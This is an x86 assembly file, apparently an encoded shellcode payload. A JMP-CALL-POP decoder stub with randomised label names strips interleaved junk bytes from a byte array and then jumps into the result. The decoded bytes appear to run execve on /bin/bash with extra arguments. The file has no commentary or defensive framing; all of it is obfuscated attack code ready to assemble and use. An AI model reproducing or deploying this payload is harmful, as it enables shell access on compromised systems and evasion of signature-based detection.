section .text
global _start
_start:
	jmp short mclYeUtAPmYoRS
YiMFUBiTJvfw:
	pop esi
	xor ecx, ecx
	mov cl, 79
	lea edi, [esi]
	xor eax,eax
	xor ebx,ebx
	
BXhaapXeqiJzhJQ:
	mov bl, byte [edi + eax]
	mov byte [esi], bl
	add al, 2
	inc esi
	loop BXhaapXeqiJzhJQ
	jmp short cmoctZtZGGpiXvhuAuyXZ
mclYeUtAPmYoRS:
	call YiMFUBiTJvfw
	cmoctZtZGGpiXvhuAuyXZ: 		db	0x31,0x55,0xc0,0x41,0x50,0xce,0x68,0xdb,0x62,0xbe,0x61,0x93,0x73,0x6e,0x68,0xea,0x68,0xf9,0x62,0x84,0x69,0x6b,0x6e,0xf6,0x2f,0x13,0x68,0xc7,0x2f,0xe6,0x2f,0x4e,0x2f,0xaa,0x2f,0xf7,0x89,0x6b,0xe3,0x7d,0x50,0x8e,0x68,0x61,0x63,0xa5,0x90,0x6c,0x90,0x76,0x90,0x35,0x68,0x23,0x2d,0x45,0x6e,0x62,0x6f,0x7f,0x72,0x2c,0x89,0xd6,0x44,0xa2,0x24,0xdb,0x05,0x61,0x50,0xe1,0x68,0x45,0x68,0xcb,0x5d,0x5c,0x3a,0x2a,0x5a,0xdb,0x68,0x13,0x5b,0x8d,0x62,0x78,0x61,0x97,0x73,0xd1,0x68,0x6b,0x50,0xfb,0x53,0xfc,0x31,0x30,0x3d,0x0a,0xc6,0x27,0x44,0x48,0x24,0xc1,0x0b,0xd8,0x20,0xf8,0x50,0xc2,0x8d,0x49,0x34,0x48,0x24,0x58,0x8d,0x25,0x4e,0x15,0x14,0x28,0x51,0x52,0x53,0xed,0x89,0x43,0xe1,0x3a,0x50,0x0c,0x8d,0xe0,0x56,0xd4,0x04,0xc3,0x52,0xff,0x8d,0x30,0x14,0x67,0x24,0x7a,0xb0,0xa7,0x0b,0x74,0xcd,0x57,0x80,0xd2
